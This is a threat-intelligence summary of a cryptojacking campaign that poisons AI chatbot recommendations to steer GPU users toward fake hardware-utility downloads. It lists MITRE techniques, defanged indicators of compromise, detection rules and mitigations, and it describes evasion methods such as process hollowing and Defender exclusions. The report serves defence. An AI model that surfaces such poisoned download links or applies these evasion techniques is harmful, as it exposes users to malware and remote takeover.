Full Report
Microsoft has warned of an active cryptojacking campaign that makes use of artificial intelligence (AI) chatbot interactions as a mechanism for surfacing malicious download sites. "This emerging delivery technique extends social engineering beyond conventional search results and increases the visibility of malicious software recommendations," Microsoft Defender Experts and the Microsoft
Analysis Summary
# Tool/Technique: AI Search Result Poisoning & High-Yield Cryptojacking
## Overview
This is an emerging delivery technique where threat actors manipulate Large Language Model (LLM) based chatbots to recommend malicious sites. The campaign specifically targets high-performance GPU users by impersonating legitimate hardware monitoring and system utility software. Once infected, the system is used for cryptocurrency mining and provides persistent remote access for potential follow-on attacks.
## Technical Details
- **Type**: Malware Delivery Technique / Cryptojacker / Remote Access Trojan (RAT)
- **Platform**: Windows
- **Capabilities**: Social engineering via AI, DLL sideloading, remote access (ScreenConnect), defense evasion (process hollowing, AV exclusions), and GPU-based cryptocurrency mining.
- **First Seen**: Observed activity reported in April 2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566 - Phishing] (AI chatbot-driven social engineering)
- [T1583.008 - Introduce Malicious Results to Search Engines]
- **[TA0003 - Persistence]**
- [T1547.001 - Registry Run Keys / Startup Folder]
- [T1053.005 - Scheduled Task]
- **[TA0005 - Defense Evasion]**
- [T1574.002 - DLL Side-Loading]
- [T1562.001 - Disable or Modify Tools] (Microsoft Defender exclusions)
- [T1055.012 - Process Hollowing]
- **[TA0040 - Impact]**
- [T1496 - Resource Hijacking] (Cryptojacking)
## Functionality
### Core Capabilities
- **AI Recommendation Poisoning**: Manipulates chatbot responses to surface attacker-controlled domains instead of official software sites.
- **Strategic Mimicry**: Impersonates tools like CrystalDiskInfo, HWMonitor, FurMark, and PDFgear to filter for targets with powerful GPUs.
- **Remote Access**: Deploys a legitimate but unauthorized ScreenConnect instance to maintain a foothold on the target network.
- **Automated Mining**: Supports multiple mining engines including `gminer`, `lolMiner`, and `SRBMiner-MULTI`.
### Advanced Features
- **Process Hollowing**: Launches malicious mining code inside a trusted, Microsoft-signed binary to evade detection.
- **Living-off-the-Land (LotL)**: Utilizes `msiexec.exe` and PowerShell scripts to fetch and install secondary payloads.
- **Environment Aware**: Monitors active processes and terminates the miner if analysis tools are detected to avoid being caught by a user or admin.
## Indicators of Compromise
- **File Names**: `autorun.dll`, `vcredist_x64.dll`, `SimpleRunPE.exe`, `vlc.exe` (malicious masquerading), `gminer`, `lolMiner`, `SRBMiner-MULTI`.
- **Registry Keys**: Deployment of standard Registry Run keys for persistence.
- **Network Indicators**:
- `193.42.11[.]108` (C2 Server)
- Subdomains of `gleeze[.]com`
- Infrastructure associated with `Dynu` (Dynamic DNS)
- **Behavioral Indicators**:
- Unauthorized `msiexec.exe` activity involving `vcredist_x64.dll`.
- Sudden spikes in GPU usage.
- Creation of Microsoft Defender exclusions via command line/PowerShell.
## Associated Threat Actors
- Unknown (The campaign is currently attributed to a financially motivated group with potential interests in data theft and ransomware).
## Detection Methods
- **Behavioral detection**: Monitor for ScreenConnect installations originating from unusual parent processes or non-standard web downloads.
- **System Monitoring**: Watch for the creation of PowerShell-based scheduled tasks that download files from remote IP addresses.
- **EDR/AV**: Look for unauthorized modifications to Microsoft Defender exclusion lists (specifically paths or process names).
## Mitigation Strategies
- **Prevention**: Educate users that AI chatbot links may be gamed or "hallucinated" and should not be trusted for software downloads.
- **Hardening**: Restrict the execution of unsigned binaries and implement "Allow Lists" for remote desktop software like ScreenConnect.
- **Content Filtering**: Block known Dynamic DNS providers (e.g., Dynu) at the network perimeter if not required for business operations.
## Related Tools/Techniques
- **SEO Poisoning**: The predecessor to AI search poisoning.
- **DLL Sideloading**: A common technique for executing malicious code via trusted applications.
- **Resource Hijacking**: Similar to the "LemonDuck" or "MyKings" botnets focused on cryptomining.